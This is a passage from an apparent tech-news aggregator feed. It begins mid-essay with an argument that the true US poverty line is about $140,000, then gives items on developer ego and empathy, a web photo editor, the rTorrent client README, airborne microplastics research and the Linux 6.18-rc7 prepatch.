But if Orshansky’s crisis threshold were calculated today using her own methodology, that $80,000 family would be living in deep poverty.

I wanted to see what would happen if I ignored the official stats and simply calculated the cost of existing. I built a Basic Needs budget for a family of four (two earners, two kids). No vacations, no Netflix, no luxury. Just the “Participation Tickets” required to hold a job and raise kids in 2024.

Using conservative, national-average data:

Childcare: $32,773

Housing: $23,267

Food: $14,717

Transportation: $14,828

Healthcare: $10,567

Other essentials: $21,857

Required net income: $118,009

Add federal, state, and FICA taxes of roughly $18,500, and you arrive at a required gross income of $136,500.

This is Orshansky’s “too little” threshold, updated honestly. This is the floor.

The single largest line item isn’t housing. It’s childcare: $32,773.

This is the trap. To reach the median household income of $80,000, most families require two earners. But the moment you add the second earner to chase that income, you trigger the childcare expense.

If one parent stays home, the income drops to $40,000 or $50,000—well below what’s needed to survive. If both parents work to hit $100,000, they hand over $32,000 to a daycare center.

The second earner isn’t working for a vacation or a boat. The second earner is working to pay the stranger watching their children so they can go to work and clear $1-2K extra a month. It’s a closed loop.

Critics will immediately argue that I’m cherry-picking expensive cities. They will say $136,500 is a number for San Francisco or Manhattan, not “Real America.”

So let’s look at “Real America.”

The model above allocates $23,267 per year for housing. That breaks down to $1,938 per month. This is the number that serious economists use to tell you that you’re doing fine.

In my last piece, Are You An American? , I analyzed a modest “starter home” which turned out to be in Caldwell, New Jersey—the kind of place a Teamster could afford in 1955. I went to Zillow to see what it costs to live in that same town if you don’t have a down payment and are forced to rent.

There are exactly seven 2-bedroom+ units available in the entire town. The cheapest one rents for $2,715 per month.

That’s a $777 monthly gap between the model and reality. That’s $9,300 a year in post-tax money. To cover that gap, you need to earn an additional $12,000 to $13,000 in gross salary.

So when I say the real poverty line is $140,000, I’m being conservative. I’m using optimistic, national-average housing assumptions. If we plug in the actual cost of living in the zip codes where the jobs are—where rent is $2,700, not $1,900—the threshold pushes past $160,000.

The market isn’t just expensive; it’s broken. Seven units available in a town of thousands? That isn’t a market. That’s a shortage masquerading as an auction.

And that $2,715 rent check buys you zero equity. In the 1950s, the monthly housing cost was a forced savings account that built generational wealth. Today, it’s a subscription fee for a roof. You are paying a premium to stand still.

Economists will look at my $140,000 figure and scream about “hedonic adjustments.” Heck, I will scream at you about them. They are valid attempts to measure the improvement in quality that we honestly value.

I will tell you that comparing 1955 to 2024 is unfair because cars today have airbags, homes have air conditioning, and phones are supercomputers. I will argue that because the quality of the good improved, the real price dropped.

And I would be making a category error. We are not calculating the price of luxury. We are calculating the price of participation.

To function in 1955 society—to have a job, call a doctor, and be a citizen—you needed a telephone line. That “Participation Ticket” cost $5 a month.

Adjusted for standard inflation, that $5 should be $58 today.

But you cannot run a household in 2024 on a $58 landline. To function today—to factor authenticate your bank account, to answer work emails, to check your child’s school portal (which is now digital-only)—you need a smartphone plan and home broadband.

The cost of that “Participation Ticket” for a family of four is not $58. It’s $200 a month.

The economists say, “But look at the computing power you get!”

I say, “Look at the computing power I need !”

The utility I’m buying is “connection to the economy.” The price of that utility didn’t just keep pace with inflation; it tripled relative to it.

I ran this “Participation Audit” across the entire 1955 budget. I didn’t ask “is the car better?” I asked “what does it cost to get to work?”

Healthcare: In 1955, Blue Cross family coverage was roughly $10/month ($115 in today’s dollars). Today, the average family premium is over $1,600/month. That’s 14x inflation.

Taxes (FICA): In 1955, the Social Security tax was 2.0% on the first $4,200 of income. The maximum annual contribution was $84. Adjusted for inflation, that’s about $960 a year. Today, a family earning the median $80,000 pays over $6,100. That’s 6x inflation.

Childcare: In 1955, this cost was zero because the economy supported a single-earner model. Today, it’s $32,000. That’s an infinite increase in the cost of participation.

The only thing that actually tracked official CPI was… food. Everything else—the inescapable fees required to hold a job, stay healthy, and raise children—inflated at multiples of the official rate when considered on a participation basis. YES, these goods and services are BETTER. I would not trade my 65” 4K TV mounted flat on the wall for a 25” CRT dominating my living room; but I don’t have a choice, either.

Once I established that $136,500 is the real break-even point, I ran the numbers on what happens to a family climbing the ladder toward that number.

What I found explains the “vibes” of the economy better than any CPI print.

Our entire safety net is designed to catch people at the very bottom, but it sets a trap for anyone trying to climb out. As income rises from $40,000 to $100,000, benefits disappear faster than wages increase.

I call this The Valley of Death.

Let’s look at the transition for a family in New Jersey:

1. The View from $35,000 (The “Official” Poor)

At this income, the family is struggling, but the state provides a floor. They qualify for Medicaid (free healthcare). They receive SNAP (food stamps). They receive heavy childcare subsidies. Their deficits are real, but capped.

2. The Cliff at $45,000 (The Healthcare Trap)

The family earns a $10,000 raise. Good news? No. At this level, the parents lose Medicaid eligibility. Suddenly, they must pay premiums and deductibles.

  • Income Gain: +$10,000

  • Expense Increase: +$10,567

  • Net Result: They are poorer than before. The effective tax on this mobility is over 100%.

3. The Cliff at $65,000 (The Childcare Trap)

This is the breaker. The family works harder. They get promoted to $65,000. They are now solidly “Working Class.”

But at roughly this level, childcare subsidies vanish. They must now pay the full market rate for daycare.

  • Income Gain: +$20,000 (from $45k)

  • Expense Increase: +$28,000 (jumping from co-pays to full tuition)

  • Net Result: Total collapse.

When you run the net-income numbers, a family earning $100,000 is effectively in a worse monthly financial position than a family earning $40,000.

At $40,000, you are drowning, but the state gives you a life vest. At $100,000, you are drowning, but the state says you are a “high earner” and ties an anchor to your ankle called “Market Price.”

In option terms, the government has sold a call option to the poor, but they’ve rigged the gamma. As you move “closer to the money” (self-sufficiency), the delta collapses. For every dollar of effort you put in, the system confiscates 70 to 100 cents.

No rational trader would take that trade. Yet we wonder why labor force participation lags. It’s not a mystery. It’s math.

The most dangerous lie of modern economics is “Mean Reversion.” Economists assume that if a family falls into debt or bankruptcy, they can simply save their way back to the average.

They are confusing Volatility with Ruin.

Falling below the line isn’t like cooling water; it’s like freezing it. It is a Phase Change.

When a family hits the barrier—eviction, bankruptcy, or default—they don’t just have “less money.” They become Economically Inert.

  • They are barred from the credit system (often for 7–10 years).

  • They are barred from the prime rental market (landlord screens).

  • They are barred from employment in sensitive sectors.

In physics, it takes massive “Latent Heat” to turn ice back into water. In economics, the energy required to reverse a bankruptcy is exponentially higher than the energy required to pay a bill.

The $140,000 line matters because it is the buffer against this Phase Change. If you are earning $80,000 with $79,000 in fixed costs, you are not stable. You are super-cooled water. One shock—a transmission failure, a broken arm—and you freeze instantly.

If you need proof that the cost of participating, the cost of working, is the primary driver of this fragility, look at the Covid lockdowns.

In April 2020, the US personal savings rate hit a historic 33%. Economists attributed this to stimulus checks. But the math tells a different story.

During lockdown, the “Valley of Death” was temporarily filled.

  • Childcare ($32k): Suspended. Kids were home.

  • Commuting ($15k): Suspended.

  • Work Lunches/Clothes ($5k): Suspended.

For a median family, the “Cost of Participation” in the economy is roughly $50,000 a year. When the economy stopped, that tax was repealed. Families earning $80,000 suddenly felt rich—not because they earned more, but because the leak in the bucket was plugged. For many, income actually rose thanks to the $600/week unemployment boost. But even for those whose income stayed flat, they felt rich because many costs were avoided.

When the world reopened, the costs returned, but now inflated by 20%. The rage we feel today is the hangover from that brief moment where the American Option was momentarily back in the money. Those with formal training in economics have dismissed these concerns, by and large. “Inflation” is the rate of change in the price level; these poor, deluded souls were outraged at the price LEVEL. Tut, tut… can’t have deflation now, can we? We promise you will like THAT even less.

But the price level does mean something, too. If you are below the ACTUAL poverty line, you are suffering constant deprivation; and a higher price level means you get even less in aggregate.

You load sixteen tons, what do you get?
Another day older and deeper in debt
Saint Peter, don’t you call me, ‘cause I can’t go
I owe my soul to the company store — Merle Travis, 1946

This mathematical valley explains the rage we see in the American electorate, specifically the animosity the “working poor” (the middle class) feel toward the “actual poor” and immigrants.

Economists and politicians look at this anger and call it racism, or lack of empathy. They are missing the mechanism.

Altruism is a function of surplus. It is easy to be charitable when you have excess capacity. It is impossible to be charitable when you are fighting for the last bruised banana.

The family earning $65,000—the family that just lost their subsidies and is paying $32,000 for daycare and $12,000 for healthcare deductibles—is hyper-aware of the family earning $30,000 and getting subsidized food, rent, childcare, and healthcare.

They see the neighbor at the grocery store using an EBT card while they put items back on the shelf. They see the immigrant family receiving emergency housing support while they face eviction.

They are not seeing “poverty.” They are seeing people getting for free the exact things that they are working 60 hours a week to barely afford. And even worse, even if THEY don’t see these things first hand… they are being shown them:

The anger isn’t about the goods. It’s about the breach of contract. The American Deal was that Effort ~ Security. Effort brought your Hope strike closer. But because the real poverty line is $140,000, effort no longer yields security or progress; it brings risk, exhaustion, and debt.

When you are drowning, and you see the lifeguard throw a life vest to the person treading water next to you—a person who isn’t swimming as hard as you are—you don’t feel happiness for them. You feel a homicidal rage at the lifeguard.

We have created a system where the only way to survive is to be destitute enough to qualify for aid, or rich enough to ignore the cost. Everyone in the middle is being cannibalized. The rich know this… and they are increasingly opting out of the shared spaces:

If you need visual proof of this benchmark error, look at the charts that economists love to share on social media to prove that “vibes” are wrong and the economy is great.

You’ve likely seen this chart. It shows that the American middle class is shrinking not because people are getting poorer, but because they’re “moving up” into the $150,000+ bracket.

The economists look at this and cheer. “Look!” they say. “In 1967, only 5% of families made over $150,000 (adjusted for inflation). Now, 34% do! We are a nation of rising aristocrats.”

But look at that chart through the lens of the real poverty line.

If the cost of basic self-sufficiency for a family of four—housing, childcare, healthcare, transportation—is $140,000, then that top light-blue tier isn’t “Upper Class.”

It’s the Survival Line.

This chart doesn’t show that 34% of Americans are rich. It shows that only 34% of Americans have managed to escape deprivation. It shows that the “Middle Class” (the dark blue section between $50,000 and $150,000)—roughly 45% of the country—is actually the Working Poor. These are the families earning enough to lose their benefits but not enough to pay for childcare and rent. They are the ones trapped in the Valley of Death.

But the commentary tells us something different:

“Americans earned more for several reasons. The first is that neoliberal economic policies worked as intended . In the last 50 years, there have been big increases in productivity, solid GDP growth and, since the 1980s, low and predictable inflation. All this helped make most Americans richer.”

neoliberal economic policies worked as intended ” — read that again. With POSIWID (the purpose of a system is what it does) in mind.

The chart isn’t measuring prosperity. It’s measuring inflation in the non-discretionary basket. It tells us that to live a 1967 middle-class life in 2024, you need a “wealthy” income.

And then there’s this chart, the shield used by every defender of the status quo:

Poverty has collapsed to 11%. The policies worked as intended!

But remember Mollie Orshansky. This chart is measuring the percentage of Americans who cannot afford a minimum food diet multiplied by three.

It’s not measuring who can afford rent (which is up 4x relative to wages). It’s not measuring who can afford childcare (which is up infinite percent). It’s measuring starvation.

Of course the line is going down. We are an agricultural superpower who opened our markets to even cheaper foreign food. Shrimp from Vietnam, tilapia from… don’t ask. Food is cheap. But life is expensive.

When you see these charts, don’t let them gaslight you. They are using broken rulers to measure a broken house. The top chart proves that you need $150,000 to make it. The bottom chart proves they refuse to admit it.

So that’s the trap. The real poverty line—the threshold where a family can afford housing, healthcare, childcare, and transportation without relying on means-tested benefits—isn’t $31,200.

It’s ~$140,000.

Most of my readers will have cleared this threshold. My parents never really did, but I was born lucky — brains, beauty (in the eye of the beholder admittedly), height (it really does help), parents that encouraged and sacrificed for education (even as the stress of those sacrifices eventually drove my mother clinically insane), and an American citizenship. But most of my readers are now seeing this trap for their children.

And the system is designed to prevent them from escaping. Every dollar you earn climbing from $40,000 to $100,000 triggers benefit losses that exceed your income gains. You are literally poorer for working harder.

The economists will tell you this is fine because you’re building wealth. Your 401(k) is growing. Your home equity is rising. You’re richer than you feel.

Next week, I’ll show you why that’s wrong. And THEN we can’t start the discussion of how to rebuild. Because we can.

The wealth you’re counting on—the retirement accounts, the home equity, the “nest egg” that’s supposed to make this all worthwhile—is just as fake as the poverty line. But the humans behind that wealth are real. And they are amazing.

A Unified Theory of Ego, Empathy, and Humility at Work

Hacker News
matthogg.fyi
2025-11-24 02:01:02
Comments...
Original Article

In our daily lives empathy and humility are obvious virtues we aspire to. They keep our egos in check. Less obvious is that they’re practical skills in the workplace, too. I think, for developers and technical leaders in particular, that the absence of ego is the best way to further our careers and do great work.

In the simplest of terms the ego is the characteristic of personhood that enables us to practice self-reflection, self-awareness, and accountability for the actions or decisions we take.

However, the ego also motivates us to reframe our perception of the world in whatever way keeps us centered in it. Each of us is perpetually driven to justify our place in the world. This constant self-justification is like an engine that idles for our entire lives, and it requires constant fine-tuning. When it runs amok this is what we call a “big” ego.

Breaking News! Developers Have Egos!

I’m not thinking only of the 10x engineer stereotype, although I’ve worked with such folks in the past. Ego is more nuanced than that. Besides the most arrogant developer in the room throwing their weight around, our egos manifest in hundreds of ways that are much harder to detect.

As developers we’re more susceptible to letting our egos run free. The nature of our work is so technical that to others it can seem obscure, arcane, or even magical. Sometimes we don’t do enough to actively dispel that notion—and just like that half the work of self-justification is already done for us.

Very often it’s not intentional. The simplest example is the overuse of jargon and acronyms. We all do it, but as Jeremy Keith explains :

Still, I get why initialisms run rampant in technical discussions. You can be sure that most discussions of particle physics would be incomprehensible to outsiders, not necessarily because of the concepts, but because of the terminology.

Simply mashing a few letters together can be empowering for ourselves while being exclusionary for others. It’s an artifact—albeit a small one—of our egos. We know what the technobabble means. Our justified place in the universe is maintained.

Sometimes we express our egos more deliberately. Developers have a clear tendency towards gatekeeping. For most, it’s an honest mistake. There’s a fine line between holding others to a certain expectation versus actively keeping people on the outside. When we see ourselves doing this we can correct it easily enough.

Sadly there are developers who seemingly like to gatekeep. They get to feel like wizards in their towers with their dusty books and potions. But, it’s actually self-limiting. Gatekeeping by definition means you’re fixed in place and never moving, standing guard for eternity.

My point is our egos can “leak” in so many ways that it takes diligence to catch it let alone correct it. The following is a short, incomplete list of typical statements we as developers might say or hear at work. If you parse them more precisely each one is an attempt at self-justification:

  • “That’s the way we’ve always done it.”
  • “It’s not that complicated! You just…”
  • “Yeah, I should be able to finish this in a day.”
  • “This legacy codebase is an absolute disaster.”
  • “Assign it to me. Nobody else will be able to fix it.”
  • “You can’t be a senior dev. You don’t know anything about…”
  • “Ugh, our morning standup is so useless.”
  • “This feature is too important to assign to the junior dev.”
  • “We should start using this new tool in our pipeline.”
  • “We should never use that new tool in our pipeline.”

Everything Is Bigger Than You

The ego is concerned with the self but very easily becomes something harmful in the absence of new information or context. Indeed, the ego nudges us to self-justify so much that one could argue it actively resists new information when left unchecked.

You may have read one of the example statements above with some familiarity and thought, “But what if I’m right?”

To which I’d say: OK, but should that be your default stance? Why might you feel the need to immediately start a conversation with a self-justification? There are ways to adjust our approach, make our points, and accept new information all at the same time.

In any interaction—be it a meeting, Slack thread, or water cooler conversation—we must remember that the matter at hand is bigger than us in ways we don’t yet understand .

This is a simple enough heuristic but we need the skills to gain that understanding. We need empathy and humility. Empathy is the ability to recognize and comprehend what someone else is thinking or feeling . Humility is a resistance to our “competitive reflexes” through the practice of emotional neutrality and vulnerability. Both serve to counteract the ego.

To make these concepts more actionable I find it simpler to define them in terms of the purposes they serve. Specifically…

  1. Empathy is how we gather new information .
  2. Humility is how we allow information to change our behavior .

This framing also helps remind us what empathy and humility are not . It’s not about putting yourself in another’s shoes, as the saying goes. It’s not about being submissive or a pushover. It’s not about altruism or self-sacrifice. We can easily practice empathy and humility without it ever being at our own expense.

The Pursuit Of Information

I don’t know about you but I go to work to solve problems, be creative, and build shit. I can’t think of a single instance where an unruly ego solved anything I’ve worked on. Ego just makes an existing challenge worse. Solutions require information I don’t have yet.

Empathy and humility are usually top of mind during situations of pain or distress, but they’re really aspects of emotional intelligence that should be activated at all times. Once you adjust your mindset to treat them as basic tools for the pursuit of information you’ll see opportunities to leverage them everywhere.

Developers can apply this mindset with almost anybody they come into contact with. Fellow developers, naturally. But also less technical teammates (e.g., QAs, designers, product owners, stakeholders) who have their own unique skills and context that our success depends on. And of course our users should be at the center of every problem we’re working to solve. Lastly, even executives and upper management have some insight to offer if you dare ( but only up to a certain point ).

“Be Curious, Not Judgmental”

I’ve been waiting years for a chance to work Ted Lasso into one of my essays. Today’s the day, readers.

The titular character is such an archetype for leadership that my jaw hit the floor when I first watched the show. The example Ted sets has spawned countless think pieces about leadership and management . Suffice it to say he exhibits all of my principles over the series’ 34 episodes. He’s empathy and humility sporting a mustache. He’s the absence of ego personified.

I highly recommend watching the show but to get a taste this 5 minute clip is worth your time. This is the famous “darts scene”…

There’s a common and derisive attitude that qualities like empathy or humility are signs of weakness. You have to get all up in your feelings. Ew! But they require enormous reserves of strength, patience, and determination. It’s those who follow their egos who are weak.

Letting your ego take control is the easiest thing in the world. Just ask any toddler throwing a temper tantrum. Resisting those impulses and remaining calm, on the other hand, has been a virtue humanity has aspired to for thousands of years. As the Roman emperor and Stoic philosopher Marcus Aurelius wrote: “The nearer a man comes to a calm mind, the closer he is to strength.”

You’re Neither Ted Lasso Nor A Roman Emperor

The practice of empathy, humility, and keeping your ego in check will test you daily . The feedback I’ve received the most from my coworkers is that I’m extraordinarily calm and even-keeled in any situation—even situations where I’d be right to freak out.

Is that just naturally my personality? Maybe in part, but remaining calm is a choice . I’m actively choosing to favor solutions over my own ego. To my colleagues past and present I confess to you now that any time you’ve seen me calm, cool, and collected I was very likely internally screaming .

If this sounds like a lot of work you might be wondering if it’s worth it. I think it is. At the very least your coworkers and colleagues will like you better. That’s no small thing.

In all seriousness, the positive feedback I get most about the developers I manage is when they’ve demonstrated empathy and humility while dialing back their egos. This is because they’re people we can work with—literally. Nobody wants to work with a narcissist or a rock star. Nobody is materially impressed by how many lines of code we wrote , or how fast we wrote it.

When people want to work with us—or even look forward to it—that means we have trust and respect. We’ll be on proper footing for working effectively as a group to solve problems. For developers this looks like coaching a junior developer, hopping on a quick call to pair with somebody, or understanding the business value of the next backlog item. For leaders this looks like people who feel empowered to do their work, who can proactively identify issues, or who can rally and adapt when circumstances change.

Anybody can do this! I can’t think of any other career advice that’s as universal as empathy and humility. Everybody is capable of, at any point in their lives, small yet impactful improvements.

So remember—watch your ego and look for opportunities to leverage empathy and humility in the pursuit of information so that you can solve problems together.

In my next essay on this subject I’ll get into the practical. What I like about this advice is that, while there’s much we can do, we don’t have to do it all to see some benefit. We can pick and choose and try something out. We can take your time and grow. Nobody’s perfect, not even Ted Lasso. Even if we take after a character like Roy Kent we can still call that a win. Just watch the show, OK?

An open-source photo editor & digital compositor for the web

Lobsters
mint.photo
2025-11-24 01:57:44
Source: https://github.com/mosaiq-software/mint Comments...

A ncurses-based command line torrent client for high performance

Hacker News
github.com
2025-11-24 01:30:51
Comments...
Original Article

RTorrent BitTorrent Client

Introduction

A ncurses-based command line torrent client for high performance.

To learn how to use rTorrent visit the Wiki .

Download the latest stable release

Related Projects

Donate to rTorrent development

  • Paypal
  • Patreon
  • SubscribeStar
  • Bitcoin: 1MpmXm5AHtdBoDaLZstJw8nupJJaeKu8V8
  • Ethereum: 0x9AB1e3C3d8a875e870f161b3e9287Db0E6DAfF78
  • Litecoin: LdyaVR67LBnTf6mAT4QJnjSG2Zk67qxmfQ
  • Cardano: addr1qytaslmqmk6dspltw06sp0zf83dh09u79j49ceh5y26zdcccgq4ph7nmx6kgmzeldauj43254ey97f3x4xw49d86aguqwfhlte

Help keep rTorrent development going by donating to its creator.

BUILDING

Jump into the github cloned directory

Install build dependencies

Install libtorrent with the same version rTorrent.

Generate configure scripts:

Optionally, generate man pages:

docbook2man rtorrent.1.xml

Man pages output to "doc/rtorrent.1".

RTorrent follows the development of libtorrent closely, and thus the versions must be in sync.

USAGE

Refer to User Guide: https://github.com/rakshasa/rtorrent/wiki/User-Guide

LICENSE

GNU GPL, see COPYING. "libtorrent/src/utils/sha_fast.{cc,h}" is originally from the Mozilla NSS and is under a triple license; MPL, LGPL and GPL. An exception to non-NSS code has been added for linking to OpenSSL as requested by Debian, though the author considers that library to be part of the Operative System and thus linking is allowed according to the GPL.

Use whatever fits your purpose, the code required to compile with Mozilla's NSS implementation of SHA1 has been retained and can be compiled if the user wishes to avoid using OpenSSL.

DEPENDENCIES

  • libcurl >= 7.12.0
  • libtorrent = (same version)
  • ncurses

BUILD DEPENDENCIES

  • libtoolize
  • aclocal
  • autoconf
  • autoheader
  • automake

'Invisible' microplastics spread in skies as global pollutant

Hacker News
www.asahi.com
2025-11-24 00:18:21
Comments...
Original Article

Minuscule airborne plastic particles are spreading to all corners of the planet, penetrating deep into human bodies and sparking alarm among researchers of the relatively new subject matter.

Studies are shedding light on the origins, transport mechanisms and impact of these pollutant microplastics, which are too small to be seen with the naked eye.

They have been found in skies above Mount Fuji, in European rain, Arctic snow and within human bodies. These byproducts of human activity could also be fueling extreme weather conditions.

“Marine microplastic pollution has drawn so much attention that the ocean has been assumed as the final destination for microplastics, but recent studies indicate that airborne plastic pollution is spreading at an alarming rate,” said Hiroshi Okochi, a Waseda University professor of environmental chemistry.

Okochi leads a research team that has been studying airborne microplastics since 2017 and was the first to show that the pollutants had made their way into cloud water.

According to studies conducted on how plastic waste is damaging marine creatures and the ocean environment, plastic litter that flows into seas degrades into “marine microplastics,” which measure 5 millimeters or less in particle size.

By contrast, few studies are available on “airborne microplastics,” most of which measure less than 2.5 micrometers (0.0025 millimeter) across.

One study published in 2016 found plastics in fiber form in rainwater in Paris, showing that plastic particles were wafting in the air.

Okochi’s team in 2023 published a study that showed water in clouds covering the top of Mount Fuji contained 6.7 pieces of microplastics per liter.

Airborne microplastics travel in different manners at different altitudes.

In the free troposphere, an atmospheric layer extending above an altitude of 2,000 to 2,500 meters, substances are transported intercontinentally over long distances by prevailing westerly winds and other air currents. They are rarely affected by things on the ground.

The microplastic particles found above 3,776-meter-tall Mount Fuji where clouds can form were carried far from their sources, Okochi’s team said.

POSSIBLE CAUSE OF TORRENTIAL DOWNPOURS

According to one theory, when a large-scale atmospheric depression forms and generates ascending air currents, ground-based and seaborne microplastics are swirled up by the wind and sea spray and carried high up into the skies.

Once in the free troposphere, strong winds push the microplastics to higher levels and at enormous speeds, polluting the layer.

A team of scientists from Germany and Switzerland reported that they had found more than 10,000 pieces of microplastics per liter of snow in the Arctic. They said such microplastics are likely traveling over long distances in the air and being deposited with snow.

Microplastics may even be inducing cloud formation.

Clouds naturally form when dust serves as nuclei for water vapor to condense on. Typical ingredients of plastic products, such as polyethylene and polypropylene, naturally repel water.

Microplastics, however, change in chemical structure and obtain hydrophilicity, or affinity for water, when they are degraded by ultraviolet rays.

That likely facilitates cloud formation through vapor condensation, Okochi said.

Some experts say microplastics could be causing sudden torrential downpours and other extreme weather phenomena.

Studies have also found that microplastics, when degraded by ultraviolet rays, emit greenhouse gases, such as methane and carbon dioxide.

PLASTICS ENTERING LUNGS

Although plastics have been found in various regions of the human body, it is not yet known what impact the airborne substances have on health.

Airborne microplastic particles measuring 1 micrometer (0.001 millimeter) or less in size are believed capable of reaching the alveoli of the lung.

A study conducted in Britain said microplastics were detected in 11 of 13 lung tissue samples from patients who underwent lung surgeries. The highest levels were found in the lowermost region of the lung.

A human breathes more than 20,000 times a day, which adds up to 600 million to 700 million times throughout a lifetime.

There is no standard method for measuring airborne microplastics, so estimated amounts being inhaled by humans vary wildly from one research article to another.

Okochi said he hopes to develop a unified method for measuring the shapes, types, sizes and concentrations of airborne plastics so researchers across the globe can use it in their observations.

“We inevitably end up inhaling airborne microplastics without knowing it because the pollution they are causing is invisible,” Okochi said. “So little is clearly known about their possible impact on health and the environment, which is only beginning to be discussed. There should be more fact-finding studies on the matter.”

HOPES ON FOREST ADSORPTION

Airborne microplastics come from various sources, including road dust, tire abrasions, artificial turf and clothing.

Effective measures to reduce exposure include avoiding the use of synthetic fiber clothes and washing clothes in mesh laundry bags to prevent the garments from rubbing together.

In the larger picture, society could reflect on whether certain plastic products in close surroundings are really necessary or could be replaced with non-plastic materials.

For airborne plastics that are too small to be visible, absorption by forests is drawing attention as a hopeful measure.

A group of researchers, including Okochi and scientists from Japan Women’s University, found that “konara” oak leaves adsorb airborne plastics through “epicuticular wax,” a coating layer on the leaf surface that defends the tissue from ultraviolet rays and external enemies.

Konara forests in Japan can absorb an estimated 420 trillion pieces of airborne microplastics a year, Okochi said,

His team is now studying the use of fast-growing paulownia trees to fight the airborne microplastics.

There are hopes this tree variety can address other environmental problems. The trees absorb large volumes of carbon dioxide and can be used to absorb radioactive substances in the soil in Fukushima Prefecture, the site of the 2011 nuclear disaster.

“Planting the trees on the roadside could help reduce inhalation by humans,” Okochi said. “We hope to pursue the potential of this new emissions reduction measure using fast-growing paulownia trees to lower the risk of human exposure.”

Kernel prepatch 6.18-rc7

Linux Weekly News
lwn.net
2025-11-24 00:10:02
Linus has released 6.18-rc7, probably the last -rc before the 6.18 release. So the rc6 kernel wasn't great: we had a last-minute core VM regression that caused people problems. That's not a great thing late in the release cycle like that, but it was a fairly trivial fix, and the cause wasn't ...
Original Article

Linus has released 6.18-rc7 , probably the last -rc before the 6.18 release.

So the rc6 kernel wasn't great: we had a last-minute core VM regression that caused people problems.

That's not a great thing late in the release cycle like that, but it was a fairly trivial fix, and the cause wasn't some horrid bug, just a latent gotcha that happened to then bite a late VM fix. So while not great, it also doesn't make me worry about the state of 6.18. We're still on track for a final release next weekend unless some big new problem rears its ugly head.